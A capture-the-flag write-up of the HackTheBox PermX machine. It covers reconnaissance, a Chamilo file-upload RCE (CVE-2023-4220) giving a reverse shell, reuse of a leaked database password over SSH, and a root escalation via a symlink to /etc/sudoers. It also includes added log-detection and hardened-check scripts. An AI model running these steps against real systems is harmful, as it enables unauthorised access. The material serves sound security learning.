HackTheBox-Machines PermX Writeup

kazma, founder and president of the NCKU Cybersecurity Club

Exploitation

Start with an nmap scan:

└──╼ [★]$ nmap -sV 10.10.11.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 12:35 CDT
Nmap scan report for 10.10.11.23
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds

There is a web service and SSH. Take a look at the web side with whatweb:

└──╼ [★]$ whatweb 10.10.11.23
http://10.10.11.23 [302 Found] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.10.11.23], RedirectLocation[http://permx.htb], Title[302 Found]
ERROR Opening: http://permx.htb - no address for permx.htb

Add it to /etc/hosts:

└──╼ [★]$ echo "10.10.11.23 permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 permx.htb

Fuzz for subdomains (virtual hosts) with ffuf, putting the candidate in the Host header:

└──╼ [★]$ ffuf -u http://permx.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.permx.htb" | grep "Status: 200"

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://permx.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 2ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 34ms]
:: Progress: [100000/100000] :: Job [1/1] :: 16666 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

Found www and lms; add both to /etc/hosts first:

└──╼ [★]$ echo "10.10.11.23 www.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 www.permx.htb
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-mn1y31pgmb]─[~]
└──╼ [★]$ echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 lms.permx.htb

www is just the main site, but lms shows a login page:
[screenshot: Chamilo login page]
Let's look up what this thing is:

Chamilo is a free software (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and the building of a network of services providers and software contributors.

It looks like free software for promoting education, which is quite meaningful, but we still have to beat it up. Look up the default admin credentials:
[screenshot: default credentials attempt]
No luck. Searching further, Chamilo has a pre-auth RCE via an unrestricted file upload in its big-upload feature (CVE-2023-4220):
https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
Just follow the README and you get a reverse shell; note that the shell lands in the bigupload/files directory, which is where the uploaded file was written:

└──╼ [★]$ nc -tlnp 4444
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$
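For the defender's view of the step above, here is a small detection over Apache access logs, added as an example; it is not part of the original writeup, the PoC or Chamilo. The log lines are constructed for the example (the attacker IP is the one from the writeup's prompt, the rest are made up), the upload endpoint path is the one given in the CVE-2023-4220 description, and the files/ directory is the one the shell above landed in. Combined log format is assumed.

```sh
#!/bin/sh

# Constructed Apache combined-log sample: one client uploads through
# bigUpload.php and then calls the dropped PHP file; the others are noise
# (a JS asset fetch, an upload attempt with no follow-up, a directory probe).
sample_access_log() {
cat <<'EOF'
10.10.14.22 - - [11/Aug/2024:17:40:01 +0000] "GET /main/inc/lib/javascript/bigupload/inc/bigUpload.php HTTP/1.1" 200 12 "-" "curl/8.0"
10.10.14.22 - - [11/Aug/2024:17:40:03 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post HTTP/1.1" 200 58 "-" "python-requests/2.31"
10.10.14.22 - - [11/Aug/2024:17:40:04 +0000] "GET /main/inc/lib/javascript/bigupload/files/rce.php?cmd=id HTTP/1.1" 200 74 "-" "python-requests/2.31"
10.10.14.50 - - [11/Aug/2024:17:41:00 +0000] "GET /main/inc/lib/javascript/bigupload/js/bigUpload.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.10.14.60 - - [11/Aug/2024:17:42:00 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post HTTP/1.1" 200 58 "-" "Mozilla/5.0"
10.10.14.70 - - [11/Aug/2024:17:43:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
EOF
}

# Read an access log on stdin and print "IP path" for every client that
# first POSTs to bigUpload.php and afterwards requests a .php file under
# bigupload/files/. In combined format $1 is the client IP, $6 the quoted
# method and $7 the request path. A POST with no follow-up (10.10.14.60)
# is only an upload attempt and is left to count_upload_posts below.
detect_bigupload_rce() {
  awk '
    $6 == "\"POST" && $7 ~ /\/bigupload\/inc\/bigUpload\.php/ { uploaded[$1] = 1 }
    $7 ~ /\/bigupload\/files\/[^ ?]*\.php/ && uploaded[$1] && !reported[$1] {
      print $1, $7
      reported[$1] = 1
    }
  '
}

# Upload POSTs per client, for triaging attempts that never ran a shell.
count_upload_posts() {
  awk '$6 == "\"POST" && $7 ~ /\/bigupload\/inc\/bigUpload\.php/ { n[$1]++ }
       END { for (ip in n) print ip, n[ip] }' | sort
}

sample_access_log | detect_bigupload_rce
sample_access_log | count_upload_posts
```

Run it against a real log with `detect_bigupload_rce < /var/log/apache2/access.log`; the dropped file name is attacker-chosen, which is why the second pattern matches any .php under files/ rather than a fixed name.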

Next, find where Chamilo keeps its configuration file:
[screenshot: search result for the configuration file location]

www-data@permx:/var/www/chamilo/app/config$ grep -r db_pass
grep -r db_pass
configuration.php:$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

Found the database password '03F6lY3uXAP2bkW8'. Database passwords in web application configs are frequently reused for system accounts, so try it against the mtz user over SSH:

└──╼ [★]$ ssh mtz@10.10.11.23
The authenticity of host '10.10.11.23 (10.10.11.23)' can't be established.
ED25519 key fingerprint is SHA256:u9/wL+62dkDBqxAG3NyMhz/2FTBJlmVC1Y1bwaNLqGA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.23' (ED25519) to the list of known hosts.
mtz@10.10.11.23's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Sun Aug 11 06:09:41 PM UTC 2024

System load: 0.0
Usage of /: 59.7% of 7.19GB
Memory usage: 23%
Swap usage: 0%
Processes: 247
Users logged in: 1
IPv4 address for eth0: 10.10.11.23
IPv6 address for eth0: dead:beef::250:56ff:feb9:c054


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 11 15:49:24 2024 from 10.10.14.21
mtz@permx:~$

Logged in!
Let's see what is in the home directory:

mtz@permx:~$ ls
sudoers user.txt
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$ ls -l /opt/acl.sh
-rwxr-xr-x 1 root root 419 Jun 5 11:58 /opt/acl.sh
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

We see a file called sudoers here. Normally that lives at /etc/sudoers, so finding one in the home directory looks like a hint for us (it is gone in the later listing below, so on a shared instance it was most likely left behind by another player; worth keeping in mind before reading too much into it). Either way, sudo -l shows what the current user may run with sudo: mtz can run /opt/acl.sh as root without a password. But ls -l shows the file is owned by root and we only have execute permission, so we cannot modify it.
Now let's look closely at what this script does:

if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi

user="$1"
perm="$2"
target="$3"

This part checks that exactly three arguments were supplied; they are the user, the permission and the target file.

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi

Next it checks that the target path starts with /home/mtz/ and does not contain ".." anywhere, otherwise it prints "Access denied". This is a test on the path string only; it says nothing about which file the path actually resolves to.

# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

Finally it checks that the third argument is a regular file, otherwise it prints an error. Note that -f follows symbolic links: a symlink whose target is a regular file passes this test.
None of the three checks looks at what the path really refers to, and setfacl applies the ACL to the link target, since a symlink itself cannot carry an ACL. So we can create a symbolic link inside the home directory that points to /etc/sudoers, use /opt/acl.sh to grant mtz rwx on that link (the ACL lands on /etc/sudoers; rw would be enough), and then edit /etc/sudoers through the link so that mtz can run anything with sudo without a password. Perfect plan; let's do it.

mtz@permx:~$ ln -s /etc/sudoers /home/mtz/evil
mtz@permx:~$ ls -l
total 4
lrwxrwxrwx 1 mtz mtz 12 Aug 12 04:13 evil -> /etc/sudoers
-rw-r----- 1 root mtz 33 Aug 12 03:53 user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/evil
mtz@permx:~$ vi evil
mtz@permx:~$ cat /etc/sudoers | grep mtz
mtz ALL=(ALL:ALL) NOPASSWD:ALL
mtz ALL=(ALL:ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$ sudo su
root@permx:/home/mtz# id
uid=0(root) gid=0(root) groups=0(root)
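For the defensive side of what just happened, here is the flawed check from /opt/acl.sh next to a fixed one, added as an example; it is not part of the original writeup or the box. Both functions take the allowed home directory as a parameter (the real script hardcodes /home/mtz/) so they can be exercised against a throwaway directory that mimics the layout; realpath from coreutils is assumed to be available.

```sh
#!/bin/sh

# The check as /opt/acl.sh does it: a textual prefix test, a ".." filter
# and -f. All three look only at the path string or follow symlinks, so
# /home/mtz/evil -> /etc/sudoers passes, and the setfacl that follows
# applies the ACL to /etc/sudoers.
acl_check_vulnerable() {
  _home=$1; _target=$2
  case $_target in
    "$_home"/*) ;;                 # must start with the allowed prefix
    *) return 1 ;;
  esac
  case $_target in
    *..*) return 1 ;;              # no ".." anywhere in the string
  esac
  [ -f "$_target" ] || return 1    # -f follows the link and sees a regular file
  return 0
}

# Fixed check: refuse symlinks outright, canonicalise the path with
# realpath (which also resolves symlinked parent directories such as
# /home/mtz/dir -> /etc), and run the prefix test on the real path.
acl_check_hardened() {
  _home=$(realpath "$1" 2>/dev/null) || return 1
  _target=$2
  [ -L "$_target" ] && return 1
  _real=$(realpath "$_target" 2>/dev/null) || return 1
  case $_real in
    "$_home"/*) ;;
    *) return 1 ;;
  esac
  [ -f "$_real" ] || return 1
  return 0
}

# Throwaway tree mimicking the box: a fake sudoers outside the home, a
# legitimate file inside it, a symlink to the fake sudoers and a symlinked
# directory. Prints the sandbox root; contents are constructed.
make_sandbox() {
  _sb=$(mktemp -d) || return 1
  mkdir -p "$_sb/home/mtz" "$_sb/etc"
  echo 'root ALL=(ALL:ALL) ALL' > "$_sb/etc/sudoers"
  echo 'notes' > "$_sb/home/mtz/notes.txt"
  ln -s "$_sb/etc/sudoers" "$_sb/home/mtz/evil"
  ln -s "$_sb/etc" "$_sb/home/mtz/dir"
  printf '%s\n' "$_sb"
}

sb=$(make_sandbox)
for t in "$sb/home/mtz/notes.txt" "$sb/home/mtz/evil" \
         "$sb/home/mtz/dir/sudoers" "$sb/home/mtz/../etc/sudoers"; do
  acl_check_vulnerable "$sb/home/mtz" "$t" && v=accept || v=reject
  acl_check_hardened "$sb/home/mtz" "$t" && h=accept || h=reject
  printf '%-32s vulnerable=%s hardened=%s\n' "${t#$sb}" "$v" "$h"
done
rm -rf "$sb"
```

Even the fixed check leaves a window between the check and the setfacl call, in which the file can be swapped for a symlink, and the symlinked-directory case shows why a plain -L test is not enough on its own. The fix that actually holds is not to let an unprivileged user drive setfacl as root on a path of their choosing at all.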

Perfect, we're geniuses!

Pwned !!!


  • Title: HackTheBox-Machines PermX Writeup
  • Author: kazma
  • Created at : 2024-08-12 01:34:16
  • Updated at : 2024-08-24 08:33:55
  • Link: https://kazma.tw/2024/08/12/HackTheBox-Machines-PermX-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.